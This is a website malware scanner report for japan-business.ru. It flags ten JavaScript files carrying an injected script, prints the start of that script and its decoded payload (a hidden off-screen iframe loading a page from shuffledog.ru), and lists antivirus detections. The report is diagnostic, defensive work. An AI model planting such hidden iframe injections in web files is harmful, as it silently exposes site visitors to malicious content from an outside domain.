
Malware Scanner report for japan-business.ru

Malicious/Suspicious/Total urls checked
1/9/15
10 of the 15 checked URLs contain malicious or suspicious code (1 malicious, 9 suspicious). See details below.
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "japan-business.ru" has probably been hacked and is losing its visitors. You need to take action as soon as possible to fix the security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
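0/0/0 (this count apparently covers only iframes present in the page HTML; the iframes decoded from the flagged scripts are listed under "Scanned pages/files" below)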
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=japan-business.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://japan-business.ru/

Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.

Scanned pages/files

Request | Server response | Status
http://japan-business.ru/
200 OK
Content-Length: 16234
Content-Type: text/html
clean
http://japan-business.ru/media/system/js/caption.js
200 OK
Content-Length: 6537
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[2846 bytes skipped]...

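Decoded script (an iframe positioned off-screen at -1300px, so the visitor does not see it, which loads a page from another domain):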


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/js/jquery.js
200 OK
Content-Length: 98768
Content-Type: application/javascript
clean
http://japan-business.ru/media/widgetkit/js/jquery.plugins.js
200 OK
Content-Length: 13804
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[3734 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/js/responsive.js
200 OK
Content-Length: 6157
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[3010 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/widgets/accordion/js/accordion.js
200 OK
Content-Length: 6698
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[3517 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/widgets/gallery/js/lazyloader.js
200 OK
Content-Length: 5255
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[2012 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/widgets/map/js/lazyloader.js
200 OK
Content-Length: 4839
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[1590 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/widgets/slideset/js/lazyloader.js
200 OK
Content-Length: 5522
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[2296 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/widgets/slideshow/js/lazyloader.js
200 OK
Content-Length: 6731
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[3538 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/widgets/twitter/twitter.js
200 OK
Content-Length: 5604
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[2391 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/templates/japan/script.js
200 OK
Content-Length: 15706
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome'
... 3436 bytes are skipped ...
nction(e) {
e = e || window.event;
button = e.target || e.srcElement;
wrapper = button.parentNode;
if (!artHasClass(button, 'active')) wrapper.className = wrapper.className.replace(/active/, "");
});
}
}
}

artLoadEvent.add(function() { artButtonsSetupJsHover("art-button"); });




artLoadEvent.add(function() {
artButtonsSetupJsHover("button");
artButtonsSetupJsHover("readon");
});

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

Antivirus reports:

Ikarus
HTML.Rce
DrWeb
JS.IFrame.566
Fortinet
JS/IFrame.XX!tr
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://japan-business.ru/nasha-deyatelnost.html
200 OK
Content-Length: 17619
Content-Type: text/html
clean
http://japan-business.ru/restorannyy-biznes.html
200 OK
Content-Length: 51786
Content-Type: text/html
clean
http://japan-business.ru/predlozheniya-iz-yaponii/
200 OK
Content-Length: 17032
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: japan-business.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 21 Sep 2014 04:19:58 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 16234
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 21 Sep 2014 04:19:58 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c947f98757d57d5d992c3fc7fbf4d8b9=68j6q9ffcqa1dpcniof9v7qr30; path=/
X-Powered-By: PleskLin

...16234 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: japan-business.ru
Referer: http://www.google.com/search?q=japan-business.ru

Result:
The result is similar to the first query. No suspicious redirects were found.